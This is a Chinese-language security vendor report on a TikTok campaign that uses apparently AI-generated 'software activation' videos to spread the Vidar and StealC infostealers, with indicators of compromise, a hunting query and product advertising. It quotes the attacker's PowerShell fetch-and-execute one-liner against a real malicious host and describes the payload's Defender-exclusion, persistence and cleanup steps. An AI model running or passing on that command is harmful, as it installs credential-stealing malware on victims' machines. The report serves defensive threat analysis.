軟體啟用教學 TikTok 影片散播 Vidar 和 StealC 資訊竊取程式
Trend™ Research 在 TikTok 上發現了一起利用影片誘騙受害者下載資訊竊取程式的攻擊行動,這是一種可經由 AI 工具來加以自動化的犯罪手法。
摘要:
- Trend Research 發現了一起利用 TikTok 來散布 Vidar 和 StealC 資訊竊取程式的最新社交工程攻擊行動。這起攻擊使用了可能由 AI 生成的影片來指示使用者執行一些謊稱為軟體啟動步驟的 PowerShell 指令。
- 由於 TikTok 演算法的關係,這些影片的觸及率相當廣,其中一部影片甚至超過了 50 萬次觀看。這項威脅有可能造成企業資料外洩、登入憑證遭到竊取,以及敏感系統被駭客入侵。
- 強化資安意識非常重要,尤其是對於 AI 生成的內容。此外,監控 PowerShell 或其他系統工具的異常指令執行狀況,也有助於盡早發掘惡意活動。
- Trend Vision One™ 已經可以偵測並攔截本文討論到的入侵指標 (IoC)。此外,Trend Vision One 的客戶還可透過追蹤查詢、Threat Insights 及 Intelligence Reports 來取得有關這起最新攻擊的豐富資訊。
Trend Research 發現了一起新的社交工程攻擊行動,利用 TikTok 龐大的使用者社群來散布 Vidar 和 StealC 資訊竊取惡意程式。有別於那些假冒 CAPTCHA 真人驗證網頁然後擷取剪貼簿內容來誘騙使用者執行惡意腳本的假 CAPTCHA 攻擊行動,這起新的攻擊行動利用了 TikTok 的熱門度以及廣為流傳的特性。
駭客使用了可能由 AI 生成的 TikTok 影片,藉由社交工程技巧,謊稱指導使用者如何啟用合法軟體或解鎖高階功能,誘騙使用者執行 PowerShell 指令。此次攻擊突顯出駭客隨時都在利用當下最流行的社群媒體平台來散播惡意程式。
這份報告詳細說明我們觀察到的攻擊手法、技巧與程序 (TTP)、入侵指標資料 (IoC) 以及這項趨勢的潛在衝擊。
跟著使用者走:社群媒體詐騙
長久以來,社群媒體平台一直都是駭客發動攻擊的管道之一,TikTok 也不例外。先前的攻擊行動大多經由網站來發動,因此我們可以從其主頁被植入了 JavaScript 來偵測駭客的惡意活動。但此次的 TikTok 攻擊行動則將社交工程技巧完全融入在影片內容當中。
社群媒體平台的龐大使用者社群與演算法,為駭客提供了一個理想的散播機制。對駭客來說,這意味著他們不需負擔基礎架構的維護工作就能廣泛散播。此外,使用 AI 生成的內容,也可以讓這類攻擊從獨立的事件升級成大規模行動,因為這些影片製作起來很快,而且還能針對不同的使用者族群量身訂做。
另一個值得注意的一點是,PowerShell 從一個技術工具變成了社交工程工具。在這波攻擊行動中,駭客利用 TikTok 影片來口頭指示使用者在自己的系統上執行惡意指令。社交工程技巧已完全融入影片本身,不須透過可能被偵測的程式碼或腳本。所以平台上並無惡意程式碼可分析或攔截,等於讓資安解決方案派不上用場。所有的步驟說明都以影音方式呈現,駭客這麼做是為了躲避現有的偵測機制,讓資安人員更難偵測及切斷這些攻擊。
第一個案例
一開始,我們發現有一名 TikTok 使用者 (@gitallowed) 張貼了多個可能由 AI 生成的不露臉影片。從那之後,我們便陸續發現更多從事類似活動的帳號,包括:@zane.houghton、@allaivo2、@sysglow.wow、@alexfixpc 和 @digitaldreams771。這些帳號目前都已停止活動。
這些影片會指示使用者執行一連串謊稱是合法軟體 (如:Windows 作業系統、Microsoft Office、CapCut 和 Spotify) 啟用步驟的指令。這些影片的內容都非常類似,只有攝影機的角度和 PowerShell 用來取得惡意檔案的下載網址有些微差異,表示這些影片很可能是自動化產生。除此之外,影片中的說話聲音似乎也是由 AI 所生成,再次證明這些影片很可能是使用 AI 工具來製作。
圖 1 顯示駭客使用的 TikTok 帳號個人檔案頁面,方便讀者更了解這起攻擊的範圍和樣貌:
這些會指示使用者執行 PowerShell 指令的影片當中,有一個吸引了超過 2 萬個讚和 100 多則回應,顯然使用者的參與度和信任度都很高。雖然在螢幕截圖中看不到確切的觀看次數,但根據 TikTok 的數據分析顯示這部影片已獲得將近 50 萬次觀看。從圖 2 可看出該影片的熱門度及參與度,這段影片的龐大互動量突顯出它的觸及率驚人,許多看過的使用者很可能都已經遵照了這些指示來執行。
在影片當中,駭客提供了一系列簡易的逐步說明,讓整個執行過程看起既簡單又合法:
- 按下 Windows + R 組合鍵。
- 輸入「powershell」然後按 Enter。
- 執行以下指令:
iex (irm hxxps://allaivo[.]me/spotify)
這些步驟的設計是為了藉由社交工程手法誘騙使用者執行 PowerShell 指令來下載並執行一個遠端腳本,進而駭入使用者的系統。
惡意腳本的執行過程
PowerShell 指令會從 hxxps://allaivo[.]me/spotify 下載一個腳本來執行 (SHA256:b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886)。
整個攻擊過程如下:
- 當腳本執行時,會先在使用者的 APPDATA 和 LOCALAPPDATA 資料夾內建立隱藏的目錄,並將這些目錄加入 Windows Defender 的排除清單來躲避偵測。
- 接著,它會從 hxxps://amssh[.]co/file.exe 下載另一個被判定為 Vidar 或 StealC 惡意程式的惡意檔案,並儲存在隱藏資料夾中。
- 腳本會不斷重試來確保惡意檔案下載成功,然後將惡意程式執行檔啟動成一個隱藏且更高權限的處理程序。
- 如果前面的程序順利完成,腳本會從 hxxps://amssh[.]co/script[.]ps1 下載另一個 PowerShell 腳本,並儲存在隱藏目錄中,然後建立系統登錄機碼以便在系統開機時自動執行腳本。
- 腳本會刪除暫存資料夾以盡量避免留下可被用於鑑識分析的痕跡,此外,其嚴密的錯誤處理能力可確保感染過程順利完成。
幕後操縱基礎架構
接著,被下載的 Vidar 和 StealC 惡意程式會連上幕後操縱 (CC) 伺服器:
- hxxps://steamcommunity[.]com/profiles/76561199846773220 (Vidar)
- hxxps://t[.]me/v00rd (Vidar)
- hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php (StealC)
尤其特別的是,Vidar 會利用 Steam 和 Telegram 這類合法服務來當成 CC 伺服器資訊的「固定情報交換點解析器」(Dead Drop Resolvers,簡稱 DDR) 來隱藏 CC 資訊。例如下面這個 Steam 個人檔案當中就含有 CC 伺服器的實際 IP 位址:
圖 5 摘要說明這起攻擊的感染過程:
對使用者和企業的資安疑慮
隨著駭客改用社群媒體來散布惡意程式,企業應重新審視自己的防禦策略。傳統的資安控管措施主要集中在惡意程式碼偵測、網址掃描以及網域信譽評等,這些對於濫用使用者信任來隱藏不肖意圖的攻擊成效不佳。企業必須採取一種更全面的作法,包括:社群媒體監控、行為分析,以及針對性的使用者教育。主動解決這些攻擊管道,就能降低遭到大規模入侵的風險,不論對使用者和企業都有幫助:
將社群媒體平台也納入威脅監控:將社群媒體威脅情報來源整合,有助於企業追蹤新興的攻擊行動,發掘那些涉及提供不尋常或技術性操作指示的高互動性內容。由於駭客經常在多個平台上重複張貼相同的內容,因此,交叉關聯不同社群媒體上的貼文,就能發掘彼此相連的攻擊行動,甚至是新興威脅。
納入行為分析:在駭客未使用到惡意程式碼的情況下,想要偵測惡意活動就必須監控使用者的行為,包括發掘異常的活動,例如執行 PowerShell 之類的系統工具。除此之外,執行非預期的指令、從不明網址直接下載、在未經授權的情況下建立資料夾,或是修改資安設定,這些都是危險訊號。
強化社交工程防範意識:員工訓練必須再次進化來超越網路釣魚,納入社群媒體影音攻擊手法。此外,也應鼓勵使用者仔細檢查不請自來的技術性操作指示、確認視訊來源的正當性,並且通報可疑內容,不論是社群媒體、即時通訊或電子郵件當中的內容。畢竟,凡是太過好康的東西,很可能就是詐騙。
採用 Trend Vision One™ 的主動式防護
Trend Vision One™ 是唯一將資安曝險管理、資安營運以及強大的多層式防護集中在一起的 AI 驅動企業網路資安平台。這套全方位的方法能協助您預測及防範威脅,讓您在所有數位資產上加速實現主動式防護的成果。它憑著數十年的網路資安領導地位,以及業界首創的 Trend Cybertron 主動式網路資安 AI,為您帶來經得起考驗的具體成果:減少 92% 的勒索病毒風險,以及縮短 99% 的偵測時間。資安領導人可評量自己的資安狀況,向所有利害關係人展示資安的持續改善。有了 Trend Vision One,您就能消除資安盲點,專心處理最重要的問題,讓資安晉升為支援您創新的策略合作夥伴。
趨勢科技威脅情報
為了隨時掌握不斷演變的威脅,趨勢科技客戶可透過 Trend Vision One™ Threat Insights 來取得 Trend Research 有關新興威脅及駭客集團的最新洞見。
Trend Vision One Threat Insights
Trend Vision One Intelligence Reports 應用程式 (IoC 掃描) https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html
- 利用 TikTok 來散布惡意程式 (Vidar、StealC) 的新興社交工程攻擊行動
追蹤查詢
Trend Vision One Search 應用程式
Trend Vision One 客戶可以使用 Search 應用程式來尋找或追蹤本文提到的惡意指標,看看是否也出現在自己的環境中。
執行 powershell 指令來下載 StealC/Vidar
eventSubId: 901 and objectRawDataStr:”iex (irm https://”
除此之外,Trend Vision One 客戶還可啟用 Threat Insights 權利來取得更多追蹤查詢。
入侵指標 (IoC)
- 檔案雜湊碼:3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b
- 檔案雜湊碼:afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5
- 檔案雜湊碼:b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886
- 網址:hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php
- 網址:hxxps://allaivo[.]me/spotify
- 網址:hxxps://amssh[.]co/file[.]exe
- 網址:hxxps://amssh[.]co/script[.]ps1
- 網址:hxxps://steamcommunity[.]com/profiles/76561199846773220
- 網址:hxxps://t[.]me/v00rd
- IP:hxxps://49[.]12[.]113[.]201
- IP:hxxps://116[.]202[.]6[.]216
◎原文來源:TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead
◎瞭解更多 趨勢科技AI 防詐達人
☞ Android用戶請立即免費下載 ☞ iOS用戶請立即免費下載
⭕️ AI 防詐防毒
趨勢科技PC-cillin雲端版 運用最新 AI 防毒防詐技術,全面保護您的身分隱私,讓您享受上網安心點。
不只防毒也防詐騙 ✓手機✓電腦✓平板,跨平台防護3到位➔ 》即刻免費下載試用
✅ 獨家 AI 隱私權分析技術 讓您的個資,由你自己掌握
✅社群帳號盜用警示 在災害擴大前,搶先一步做好防範
✅全球個資外洩追蹤 24小時為您監測守護
✅跨平台密碼安全管理讓 您安心儲存所有網路帳密
趨勢科技不只是網路安全守護者,還提供各種實用3C冷知識追蹤我們的IG 帳號看更多讓你數位生活更便利、更安全的貼文
⭕️獨家!每週精選最火紅的詐騙與資安新聞,讓您隨時掌握資安警訊 不想成為下一個受害者嗎?立即訂閱,搶先一步防範
https://trend-tw.com/tcOnO/ig
–